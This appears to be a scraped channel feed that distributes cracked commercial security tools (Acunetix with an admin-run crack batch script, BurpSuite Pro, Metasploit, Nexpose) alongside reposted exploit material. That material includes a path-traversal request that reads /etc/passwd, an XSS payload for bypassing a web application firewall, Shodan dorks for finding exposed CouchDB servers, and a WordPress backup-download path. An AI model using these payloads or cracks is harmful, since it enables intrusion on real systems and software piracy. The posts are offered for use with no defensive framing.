2 261
Subscribers
No data24 hours
+37 days
-1030 days
Posts Archive
2 261
Rapid7 InsightVM/Nexpose 6.6.156 release 2022 August 17
windows
New Vulnerability proof. We added the vulnerability proof to the vulnerability investigation pop-up. Fixed The Database Export Report has been removed from the Security Console and from documentation. An issue was fixed so that the Scan Assistant for Windows no longer results in incomplete fingerprints.#nexpose
2 261
This is from the latest Acunetix dist. Since many people downloaded the old file this is the only change. Just put it in with other install files and run it as admin to automate crack install. This is for people who had trouble with the manual directions. Full archive will be uploaded now for people who didn't get it yet, this time with bat file included. -z
** NEW ** Now you can just run the crack.bat file which should automatically do the steps for you. It must be run as admin (the script will try to elevate if you don't, and let you know) It will add the hosts entries if they aren't already there, it'll stop and start the service as needed, copy over the license files and set permissions, etc. ** NEW **#acunetix
2 261
re-up with fixed bat file and instructions (not needed if you use bat file) -z
#acunetix
2 261
BurpSuite Professional x64 2022.9 with AUTO UPDATE again -ZEN 20220913
!
ABOUT BURPSUITE PRO
Everyone knows this web auditing tool. Burpsuite Pro is the defacto bug bounty tool and integrated platform for performing security testing of web applications. Its various tools work seamlessly together to
support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun. #burp
2 261
Metasploit latest with crack that has been universal for a long time similar to nexpose universal. This has working Rapid PenTest, etc. No trial required. -z
#metasploit
2 261
This is from the latest Acunetix dist. Since many people downloaded the old file this is the only change. Just put it in with other install files and run it as admin to automate crack install. This is for people who had trouble with the manual directions. Full archive will be uploaded now for people who didn't get it yet, this time with bat file included. -z
** NEW ** Now you can just run the crack.bat file which should automatically do the steps for you. It must be run as admin (the script will try to elevate if you don't, and let you know) It will add the hosts entries if they aren't already there, it'll stop and start the service as needed, copy over the license files and set permissions, etc. ** NEW **
2 261
Rapid7 InsightVM/Nexpose 6.6.156 release 2022 August 17
windows
New Vulnerability proof. We added the vulnerability proof to the vulnerability investigation pop-up. Fixed The Database Export Report has been removed from the Security Console and from documentation. An issue was fixed so that the Scan Assistant for Windows no longer results in incomplete fingerprints.
2 261
Out Of Band Update: Cobalt Strike 4.7.1 | Cobalt Strike
CVE-2022-39197 XSS2RCE !
CS version<=4.7
https://www.cobaltstrike.com/blog/out-of-band-update-cobalt-strike-4-7-1/
2 261
CVE-2022-37299 (Shirne CMS 1.2.0. Path Traversal)
Poc:
GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test
2 261
Repost from N/a
Akamai WAF bypass
<A href="javascrip%09t:eval.apply${[jj.className+(23)]}" id=jj class=alert>Click Here2 261
Repost from N/a
#apache CouchDB 3.2.1 Remote code execution : #CVE -2022-24706
#Dorks
#Shodan: port:4369 "name couchdb at"
#ZoomEye: port:"4369"+"epmd_port"
2 261
Repost from N/a
WordPress Plugin Duplicator < 1.4.7
Backup download.
The backup file can be downloaded using the "is_daws" parameter.
url/backups-dup-lite/dup-installer/main.installer.php
2 261
GitHub - Ruia-ruia/CVE-2022-29582-Exploit: Exploit for CVE-2022-29582 targeting Google's Kernel CTF - https://github.com/Ruia-ruia/CVE-2022-29582-Exploit
2 261
CVE-2022-35650: Moodle, occurs due to input validation error when importing lesson questions. This insufficient path checks results in arbitrary file read risk.
PoC
https://0x1337.ninja/2022/07/30/cve-2022-35650-analysis/
